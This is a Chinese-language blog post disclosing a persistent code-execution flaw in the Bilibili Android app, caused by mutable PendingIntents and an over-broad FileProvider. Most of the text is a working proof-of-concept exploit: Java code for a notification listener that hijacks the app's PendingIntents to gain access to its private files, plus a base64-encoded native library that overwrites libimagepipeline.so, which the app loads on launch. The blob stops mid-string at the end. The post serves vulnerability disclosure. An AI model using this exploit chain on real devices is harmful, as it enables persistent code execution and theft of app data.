Steven's BlogAppearance
B站持久任意代码执行漏洞
概述
B站的安卓版本存在多处PendingIntent可以修改的漏洞,进而导致了任意代码执行漏洞. 针对版本为当前最新版6.57.0
什么是PendingIntent
关于PendingIntent的介绍,可以查看安卓官方网站. 这个组件的功能就是在于授予收到PendingIntent的其他进程可以以发出者的身份发出特定的Intent. 就像这个Intent是PendingIntent的创建者进程创建的一样. 主要应用场景由:
- Notification
- AppWidget
- 隐式/显式Intent直接携带
- 其他
如果PendingIntent发出的时候没有携带FLAG_IMMUTABLE,那么收到的人就可以对其携带的Intent进行修改,然后再发送出去,这时候就可以做许多有破坏性的工作.
漏洞描述
总共验证,存在三处持久任意代码执行,下面逐一描述.
App更新
如果app有新版本,那么可以关于处更新下载这个App,在apk文件下载完毕后会发送一个PendingIntent,而这个PendingIntent没有携带FLAG_IMMUTABLE,并且Intent的action,package均为空.
相关调用栈:
azure
at android.app.PendingIntent.getActivity(Native Method)
at android.app.PendingIntent.getActivity(PendingIntent.java:317)
at android.app.PendingIntent.getActivity(Native Method)
at tv.danmaku.bili.update.internal.network.download.UpdateService2.K(BL:2)
at tv.danmaku.bili.update.internal.network.download.UpdateService2.o(BL:1)
at tv.danmaku.bili.update.internal.network.download.UpdateService2$e.k(BL:2)
at com.bilibili.lib.okdownloader.internal.core.StatefulTaskWrapper$g.run(BL:3)
at android.os.Handler.handleCallback(Handler.java:938)
at android.os.Handler.dispatchMessage(Handler.java:99)
at android.os.Looper.loop(Looper.java:223)
at android.app.ActivityThread.main(ActivityThread.java:7664)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:592)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:947)
游戏下载
App的游戏中心可以下载游戏,在游戏apk文件下载完毕后,会发出一个PendingIntent,而这个PendingIntent没有携带FLAG_IMMUTABLE,并且Intent的package均为空.
相关调用栈:
azure
found getActivity1, action=android.intent.action.VIEW,package= null
java.lang.Throwable
at android.app.PendingIntent.getActivity(Native Method)
at com.bilibili.game.service.q.q.e(BL:9)
at com.bilibili.game.service.DownloadService.r(BL:21)
at com.bilibili.game.service.DownloadService.onStatusChange(BL:1)
at com.bilibili.game.service.k.handleMessage(BL:103)
at android.os.Handler.dispatchMessage(Handler.java:106)
at android.os.Looper.loop(Looper.java:223)
at android.app.ActivityThread.main(ActivityThread.java:7664)
at java.lang.reflect.Method.invoke(Native Method)
at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:592)
at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:947)
这里由于这个PendingIntent携带了Data,并且Action是android.intent.action.VIEW,所以必须匹配其filter才行.
xml
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.BROWSABLE" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="file" />
<data android:scheme="content" />
<data android:scheme="qb" />
<data android:mimeType="*/*" />
</intent-filter>
视频缓存
找到任意视频播放,然后点击右上角的...,选择缓存,这时候会对发送一个PendingIntent,这个Intent是一个典型的双无Intent.
Intent的修改
在Manifest文件中可以发现
xml
<provider android:name="com.bilibili.app.comm.list.common.downloadapk.DownloadApkProvider" android:exported="false" android:authorities="tv.danmaku.bili.apkdownloader.fileprovider" android:grantUriPermissions="true">
<meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/a_res_0x7f14000d"/>
</provider>
a_res_0x7f14000d.xml
xml
<?xml version="1.0" encoding="utf-8"?>
<paths>
<external-files-path name="game_apk" path="apks"/>
<external-files-path name="app_update" path="update"/>
<root-path name="root" path=""/>
<cache-path name="internal" path="boxing"/>
<external-path name="external" path="DCIM/bili/boxing"/>
<external-files-path name="opensdk_external" path="Images/tmp"/>
<root-path name="opensdk_root" path=""/>
<external-files-path name="shareData" path="gif"/>
<external-files-path name="share_files" path="."/>
</paths>
这里对外暴露了一个FileProvider,并且android:grantUriPermissions="true",这时候可以参考我的文章为什么要保护未导出组件.
so 文件的自动加载
经过对代码的分析,可以发现,App每次启动的时候会自动加载/data/data/tv.danmaku.bili/lib-main/libimagepipeline.so,所以如果我们能够覆盖这个so文件,就可以做到代码的持久任意执行. 具体思路可以参考我的文章Tiktok持久任意代码执行漏洞.
poc
首先,要存在一个可以接受Notification的NotificationListenerService:
java
public class NotificationHijack extends NotificationListenerService {
String tag="xxxx";
@SuppressLint("NewApi")
@RequiresApi(api = Build.VERSION_CODES.M)
@Override
public void onNotificationPosted(StatusBarNotification sbn) {
Notification notification = sbn.getNotification();
if (notification == null) {
return;
}
Log.e(tag,"receive notification");
send(notification.contentIntent);
send(notification.deleteIntent);
try {
Field field = notification.getClass().getDeclaredField("allPendingIntents");
field.setAccessible(true);
ArraySet<PendingIntent> allPendingIntents = (ArraySet<PendingIntent>) field.get(notification);
if(allPendingIntents!=null){
for (PendingIntent pi :allPendingIntents
) {
send(pi);
}
}
} catch (Exception e) {
e.printStackTrace();
}
send(notification.fullScreenIntent);
Notification.Action[] actions = notification.actions;
if(actions!=null){
for (Notification.Action na: actions
) {
send(na.actionIntent);
}
}
if(notification.getBubbleMetadata()!=null){
send(notification.getBubbleMetadata().getIntent());
send(notification.getBubbleMetadata().getDeleteIntent());
}
}
private void send(PendingIntent pi){
Log.e(tag,"send,"+pi);
try {
if (pi != null) {
pi.describeContents();
Intent intent = new Intent("evil");
intent.setPackage(getPackageName());
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.setClass(this,EvilActivity.class);
intent.setClipData(ClipData.newRawUri(null, Uri.parse("content://tv.danmaku.bili.apkdownloader.fileprovider/root/data/data/tv.danmaku.bili/shared_prefs/sync.xml")));
intent.getClipData().addItem(new ClipData.Item(Uri.parse("content://tv.danmaku.bili.apkdownloader.fileprovider/root/data/data/tv.danmaku.bili/lib-main/libimagepipeline.so")));
Log.e(tag,"pisend,"+pi.toString());
pi.send(this, 0, intent, new PendingIntent.OnFinished() {
@Override
public void onSendFinished(PendingIntent pendingIntent, Intent intent, int resultCode, String resultData, Bundle resultExtras) {
if(intent.getComponent()!=null){
return;
}
String action = intent.getAction();
String aPackage = intent.getPackage();
ClipData data=intent.getClipData();
if( (action!=null && action.equals("evil")) ||
(aPackage!=null && aPackage.equals(getPackageName()))){
Log.e(tag, "Hijack success From pkg: " + pendingIntent.getCreatorPackage() + ". Intent Uri: " + intent.toUri(Intent.URI_INTENT_SCHEME));
}
}
}, null);
}
} catch (PendingIntent.CanceledException e) {
e.printStackTrace();
Log.e(tag,"cancled");
}
}
}
这里的主要工作是收到以后,通过反射的方式提取到这个PendingIntent,然后修改其携带的Intent,对其添加Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION, 同时添加intent.getClipData().addItem(new ClipData.Item(Uri.parse("content://tv.danmaku.bili.apkdownloader.fileprovider/root/data/data/tv.danmaku.bili/lib-main/libimagepipeline.so")));,目的在于将这个intent转发给自己的EvilActivity,这样就可以为自己授权文件访问的权限了. EvilActivity:
java
public class EvilActivity extends Activity {
String tag="xxxx";
public final static String s="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sKuAgAAAAABDlwGBsKuAgAAAAABGlwGBsKvwgAAAAABBlwGBsLALhAAAAABDlwGBsKuAgAAAAABBlwGBsLANhAAAAABDlwGBsKuAgAAAAABBlwGBsLANhAAAAABBlwGBsLANhAAAAABBlwGBsLANhAAAAABBlwGBsLALhAAAAABBlwGBsLANhAAAAABBlwGBsLANhAAAAABlY2hvIDEyMyA+IC9kYXRhL2RhdGEvdHYuZGFubWFrdS5iaWxpL3BvYwBqYXZhL2xhbmcvUnVudGltZUV4Y2VwdGlvbgBsaWJpbWFnZXBpcGVsaW5lAGNvdWxkIG5vdCBmaW5kIFJ1bnRpbWVFeGNlcHRpb24gY2xhc3MAQ291bGQgbm90IHJlZ2lzdGVyIEJpdG1hcHMgbWV0aG9kcwBDb3VsZCBub3QgcmVnaXN0ZXIgRGFsdmlrUHVyZ2VhYmxlRGVjb2RlciBtZXRob2RzAENvdWxkIG5vdCByZWdpc3RlciBOYXRpdmVNZW1vcnlDaHVuayBtZXRob2RzAGNvbS9mYWNlYm9vay9pbWFnZXBpcGVsaW5lL25hdGl2ZWNvZGUvQml0bWFwcwBjb20vZmFjZWJvb2svaW1hZ2VwaXBlbGluZS9uYXRpdmVjb2RlL0RhbHZpa1B1cmdlYWJsZURlY29kZXIAbmF0aXZlQ29weUJpdG1hcAAoTGFuZHJvaWQvZ3JhcGhpY3MvQml0bWFwO0lMYW5kcm9pZC9ncmFwaGljcy9CaXRtYXA7SUkpVgBDb3VsZCBub3QgbG9jayBkZXNpbmF0aW9uJ3MgcGl4ZWxzAENvdWxkIG5vdCBsb2NrIHNvdXJjZSdzIHBpeGVscwBuYXRpdmVQaW5CaXRtYXAAKExhbmRyb2lkL2dyYXBoaWNzL0JpdG1hcDspVgBGYWlsZWQgdG8gcGluIEJpdG1hcABjb20vZmFjZWJvb2svaW1hZ2VwaXBlbGluZS9tZW1vcnkvTmF0aXZlTWVtb3J5Q2h1bmsAbmF0aXZlQWxsb2NhdGUAKEkpSgBuYXRpdmVGcmVlAChKKVYAbmF0aXZlQ29weVRvQnl0ZUFycmF5AChKW0JJSSlWAG5hdGl2ZUNvcHlGcm9tQnl0ZUFycmF5AG5hdGl2ZU1lbWNweQAoSkpJKVYAbmF0aXZlUmVhZEJ5dGUAKEopQgBjb3VsZCBub3QgYWxsb2NhdGUgbWVtb3J5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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